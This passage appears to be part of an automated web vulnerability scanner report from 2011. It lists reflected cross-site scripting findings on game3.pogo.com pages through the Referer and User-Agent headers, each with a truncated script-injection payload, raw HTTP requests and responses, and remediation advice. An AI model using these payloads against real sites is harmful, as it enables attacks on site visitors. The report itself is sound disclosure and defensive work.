Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /error/java-problem.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:42 GMT Server: Apache-Coyote/1.1 Content-Length: 6780 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Game loading error </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Game loading error Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated ...[SNIP]... |
3.632. http://game3.pogo.com/exhibit/game/game.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /exhibit/game/game.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd05</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /exhibit/game/game.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Content-Length: 3799 Date: Sun, 09 Jan 2011 02:15:33 GMT Server: Apache-Coyote/1.1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.633. http://game3.pogo.com/exhibit/intermission.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /exhibit/intermission.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 563d3</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /exhibit/intermission.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Content-Length: 3797 Date: Sun, 09 Jan 2011 02:15:37 GMT Server: Apache-Coyote/1.1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.634. http://game3.pogo.com/exhibit/loading/loading.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /exhibit/loading/loading |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 162d4</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /exhibit/loading/loading Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Content-Length: 3799 Date: Sun, 09 Jan 2011 02:15:30 GMT Server: Apache-Coyote/1.1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Error: Invalid URL </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Invalid URL Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; if (typeof( ...[SNIP]... |
3.635. http://game3.pogo.com/exhibit/loading/loading.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /exhibit/loading/loading |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 426d2</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /exhibit/loading/loading Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:16:09 GMT Server: Apache-Coyote/1.1 Content-Length: 4251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Ad Loading Page"; s.eVar3="scrabble"; s.prop2="pogo"; s.prop5="scrabble"; s.channel="pogo"; s.prop7="POGO:pogo s.pr ...[SNIP]... |
3.636. http://game3.pogo.com/room/game/autoplay-table.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/game/autoplay-table |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6dd7</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/game/autoplay-table Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:21 GMT Server: Apache-Coyote/1.1 Content-Length: 35532 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.637. http://game3.pogo.com/room/game/chatshell.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/game/chatshell.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd068</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/game/chatshell.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:17 GMT Server: Apache-Coyote/1.1 Content-Length: 35487 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.638. http://game3.pogo.com/room/game/controlshell.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/game/controlshell |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2aeb8</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/game/controlshell Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:20 GMT Server: Apache-Coyote/1.1 Content-Length: 35514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.639. http://game3.pogo.com/room/game/dashshell.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/game/dashshell.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce6a2</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/game/dashshell.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:15 GMT Server: Apache-Coyote/1.1 Content-Length: 35487 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.640. http://game3.pogo.com/room/game/frameset.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/game/frameset.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 804dd</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/game/frameset.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:21 GMT Server: Apache-Coyote/1.1 Content-Length: 35477 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.641. http://game3.pogo.com/room/game/game.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/game/game.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39631</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/game/game.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:27 GMT Server: Apache-Coyote/1.1 Content-Length: 35442 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.642. http://game3.pogo.com/room/game/gameshell.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/game/gameshell.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b9b</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/game/gameshell.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:14 GMT Server: Apache-Coyote/1.1 Content-Length: 35486 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenticated"; ...[SNIP]... |
3.643. http://game3.pogo.com/room/loading/init.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/init.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11234</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/loading/init.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Content-Length: 4179 Date: Sun, 09 Jan 2011 02:14:51 GMT Server: Apache-Coyote/1.1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Address Messed Up </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Address Messed Up Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; ...[SNIP]... |
3.644. http://game3.pogo.com/room/loading/jvmtest.jsp [Referer HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d33b9</script><scriptThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /room/loading/jvmtest.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 Referer: http://www.google.com |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Type: text/html;charset=UTF-8 Content-Length: 4179 Date: Sun, 09 Jan 2011 02:14:52 GMT Server: Apache-Coyote/1.1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> Pogo: Address Messed Up </title> ...[SNIP]... =s.linkTrackVars + 'prop6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://www s.eVar2="pogo"; s.pageName="ERROR: Address Messed Up Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:error: s.prop8="Non Authenticated"; ...[SNIP]... |
3.645. http://game3.pogo.com/room/loading/jvmtest.jsp [User-Agent HTTP header] previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://game3.pogo.com |
Path: | /room/loading/jvmtest.jsp |
Issue detail
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4313"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
